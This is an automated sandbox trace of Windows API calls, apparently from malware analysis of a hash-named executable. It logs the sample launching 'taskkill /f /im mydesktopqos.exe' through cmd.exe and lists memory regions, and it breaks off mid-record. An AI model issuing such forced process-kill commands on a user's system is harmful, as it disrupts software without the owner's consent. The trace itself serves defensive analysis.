GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xf43680, cchData=32 | out: lpLCData="Sun") returned 4 [0162.122] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xf434c0, cchData=8 | out: lpLCData=".") returned 2 [0162.122] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xf434e0, cchData=8 | out: lpLCData=",") returned 2 [0162.122] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0162.124] GetProcessHeap () returned 0x680000 [0162.124] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20c) returned 0x68aaa8 [0162.124] GetConsoleTitleW (in: lpConsoleTitle=0x68aaa8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0162.128] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0162.128] GetProcAddress (hModule=0x75600000, lpProcName="CopyFileExW") returned 0x7561ffc0 [0162.128] GetProcAddress (hModule=0x75600000, lpProcName="IsDebuggerPresent") returned 0x7561b0b0 [0162.128] GetProcAddress (hModule=0x75600000, lpProcName="SetConsoleInputExeNameW") returned 0x7559b440 [0162.129] GetProcessHeap () returned 0x680000 [0162.129] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x400a) returned 0x68bd60 [0162.129] GetProcessHeap () returned 0x680000 [0162.129] RtlFreeHeap (HeapHandle=0x680000, Flags=0x0, BaseAddress=0x68bd60) returned 1 [0162.130] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0162.130] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0162.130] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0162.131] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0162.131] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0162.131] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0162.131] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0162.131] GetProcessHeap () returned 0x680000 [0162.131] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x58) returned 0x68acc0 [0162.131] GetProcessHeap () returned 0x680000 [0162.131] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x1a) returned 0x687288 [0162.132] GetProcessHeap () returned 0x680000 [0162.132] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x3c) returned 0x68ad20 [0162.133] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0162.136] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0162.136] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0162.136] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0162.136] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0162.136] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0162.136] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0162.136] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0162.136] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0162.136] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0162.136] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0162.136] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0162.136] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0162.136] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0162.136] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0162.136] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0162.136] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0162.136] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0162.136] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0162.136] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0162.136] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0162.136] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0162.136] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0162.136] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0162.136] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0162.136] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0162.136] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0162.137] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0162.137] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0162.137] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0162.137] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0162.137] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0162.137] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0162.137] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0162.137] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0162.137] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0162.137] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0162.137] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0162.137] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0162.137] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0162.137] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0162.137] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0162.137] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0162.137] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0162.137] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0162.137] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0162.137] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0162.137] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0162.137] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0162.137] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0162.137] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0162.137] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0162.137] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0162.137] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0162.137] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0162.137] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0162.137] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0162.137] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0162.137] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0162.138] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0162.138] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0162.138] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0162.138] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0162.138] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0162.138] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0162.138] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0162.138] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0162.138] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0162.138] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0162.138] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0162.138] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0162.138] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0162.138] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0162.138] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0162.138] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0162.138] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0162.138] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0162.138] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0162.138] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0162.139] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0162.139] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0162.139] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0162.139] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0162.139] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0162.139] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0162.139] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0162.139] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0162.139] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0162.139] GetProcessHeap () returned 0x680000 [0162.139] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x210) returned 0x68ad68 [0162.139] GetProcessHeap () returned 0x680000 [0162.139] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x4e) returned 0x68af80 [0162.139] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0162.140] GetProcessHeap () returned 0x680000 [0162.140] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x418) returned 0x6805c8 [0162.140] SetErrorMode (uMode=0x0) returned 0x8003 [0162.140] SetErrorMode (uMode=0x1) returned 0x0 [0162.140] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x6805d0, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0162.140] SetErrorMode (uMode=0x8003) returned 0x1 [0162.140] GetProcessHeap () returned 0x680000 [0162.140] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6805c8, Size=0x56) returned 0x6805c8 [0162.140] GetProcessHeap () returned 0x680000 [0162.140] RtlSizeHeap (HeapHandle=0x680000, Flags=0x0, MemoryPointer=0x6805c8) returned 0x56 [0162.140] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0162.140] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0162.140] GetProcessHeap () returned 0x680000 [0162.140] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x110) returned 0x68afd8 [0162.140] GetProcessHeap () returned 0x680000 [0162.140] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x218) returned 0x680628 [0162.145] GetProcessHeap () returned 0x680000 [0162.145] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x680628, Size=0x112) returned 0x680628 [0162.145] GetProcessHeap () returned 0x680000 [0162.145] RtlSizeHeap (HeapHandle=0x680000, Flags=0x0, MemoryPointer=0x680628) returned 0x112 [0162.145] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0162.145] GetProcessHeap () returned 0x680000 [0162.145] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xe0) returned 0x68b0f0 [0162.147] GetProcessHeap () returned 0x680000 [0162.147] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x68b0f0, Size=0x76) returned 0x68b0f0 [0162.147] GetProcessHeap () returned 0x680000 [0162.147] RtlSizeHeap (HeapHandle=0x680000, Flags=0x0, MemoryPointer=0x68b0f0) returned 0x76 [0162.147] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0162.147] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0162.148] GetLastError () returned 0x2 [0162.148] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0162.148] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x68b170 [0162.148] GetProcessHeap () returned 0x680000 [0162.148] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x687688 [0162.148] FindClose (in: hFindFile=0x68b170 | out: hFindFile=0x68b170) returned 1 [0162.148] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0162.148] GetLastError () returned 0x2 [0162.148] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x68b170 [0162.149] GetProcessHeap () returned 0x680000 [0162.149] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x687688, Size=0x4) returned 0x687e98 [0162.149] FindClose (in: hFindFile=0x68b170 | out: hFindFile=0x68b170) returned 1 [0162.149] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0162.149] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0162.149] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0162.155] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0162.155] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0162.155] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x13c, hStdOutput=0x140, hStdError=0x144)) [0162.155] GetProcessHeap () returned 0x680000 [0162.155] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x18) returned 0x687828 [0162.155] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0162.155] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0162.155] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0162.155] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0162.155] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0162.155] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0162.155] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0162.155] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0162.155] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0162.155] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0162.155] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0162.155] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0162.155] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0162.155] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0162.155] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0162.155] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0162.155] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0162.155] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0162.155] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0162.155] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0162.155] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0162.155] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0162.156] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0162.156] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0162.156] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0162.156] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0162.156] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0162.156] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0162.156] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0162.156] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0162.156] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0162.156] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0162.156] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0162.156] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0162.156] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0162.156] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0162.156] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0162.156] GetProcessHeap () returned 0x680000 [0162.156] RtlFreeHeap (HeapHandle=0x680000, Flags=0x0, BaseAddress=0x687828) returned 1 [0162.156] GetProcessHeap () returned 0x680000 [0162.156] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xa) returned 0x687ea8 [0162.156] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0162.159] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im mydesktopqos.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im mydesktopqos.exe ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="taskkill /f /im mydesktopqos.exe ", lpProcessInformation=0x19f6fc*(hProcess=0x9c, hThread=0x98, dwProcessId=0x4e4, dwThreadId=0x137c)) returned 1 [0162.183] CloseHandle (hObject=0x98) returned 1 [0162.183] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0162.183] GetProcessHeap () returned 0x680000 [0162.184] RtlFreeHeap (HeapHandle=0x680000, Flags=0x0, BaseAddress=0x689e60) returned 1 [0162.184] GetEnvironmentStringsW () returned 0x689e60* [0162.184] GetProcessHeap () returned 0x680000 [0162.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xa76) returned 0x687fe8 [0162.184] FreeEnvironmentStringsA (penv="=") returned 1 [0162.184] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0163.381] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x80) returned 1 [0163.381] CloseHandle (hObject=0x9c) returned 1 [0163.382] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000080") returned 8 [0163.382] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0163.383] GetProcessHeap () returned 0x680000 [0163.383] RtlFreeHeap (HeapHandle=0x680000, Flags=0x0, BaseAddress=0x687fe8) returned 1 [0163.383] GetEnvironmentStringsW () returned 0x68b2b8* [0163.383] GetProcessHeap () returned 0x680000 [0163.383] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xa9c) returned 0x687fe8 [0163.383] FreeEnvironmentStringsA (penv="=") returned 1 [0163.384] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0163.384] GetProcessHeap () returned 0x680000 [0163.384] RtlFreeHeap (HeapHandle=0x680000, Flags=0x0, BaseAddress=0x687fe8) returned 1 [0163.384] GetEnvironmentStringsW () returned 0x68b2b8* [0163.384] GetProcessHeap () returned 0x680000 [0163.384] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xa9c) returned 0x687fe8 [0163.384] FreeEnvironmentStringsA (penv="=") returned 1 [0163.384] GetProcessHeap () returned 0x680000 [0163.384] RtlFreeHeap (HeapHandle=0x680000, Flags=0x0, BaseAddress=0x687ea8) returned 1 [0163.384] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0163.384] _get_osfhandle (_FileHandle=1) returned 0x140 [0163.384] SetConsoleMode (hConsoleHandle=0x140, dwMode=0x0) returned 0 [0163.384] _get_osfhandle (_FileHandle=1) returned 0x140 [0163.384] GetConsoleMode (in: hConsoleHandle=0x140, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0163.384] _get_osfhandle (_FileHandle=0) returned 0x13c [0163.384] GetConsoleMode (in: hConsoleHandle=0x13c, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0163.384] GetConsoleOutputCP () returned 0x1b5 [0163.398] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0163.398] SetThreadUILanguage (LangId=0x0) returned 0x409 [0163.453] exit (_Code=128) Thread: id = 185 os_tid = 0x12d0 Process: id = "27" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x614ef000" os_pid = "0x4e4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "26" os_parent_pid = "0x54c" cmd_line = "taskkill /f /im mydesktopqos.exe " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2292 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2293 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2294 start_va = 0x50000 end_va = 0x65fff monitored = 0 entry_point = 0x5de80 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\SysWOW64\\taskkill.exe" (normalized: "c:\\windows\\syswow64\\taskkill.exe") Region: id = 2295 start_va = 0x70000 end_va = 0x406ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 2296 start_va = 0x4070000 end_va = 0x4084fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004070000" filename = "" Region: id = 2297 start_va = 0x4090000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 2298 start_va = 0x40d0000 end_va = 0x410ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 2299 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 2300 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2301 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2302 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2303 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2304 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 2305 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2306 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 2307 start_va = 0x40000 end_va = 0x43fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2308 start_va = 0x4110000 end_va = 0x4110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004110000" filename = "" Region: id = 2309 start_va = 0x4120000 end_va = 0x4121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 2310 start_va = 0x44e0000 end_va = 0x44effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044e0000" filename = "" Region: id = 2311 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2312 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2313 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2314 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2315 start_va = 0x44f0000 end_va = 0x479ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 2316 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2317 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2318 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 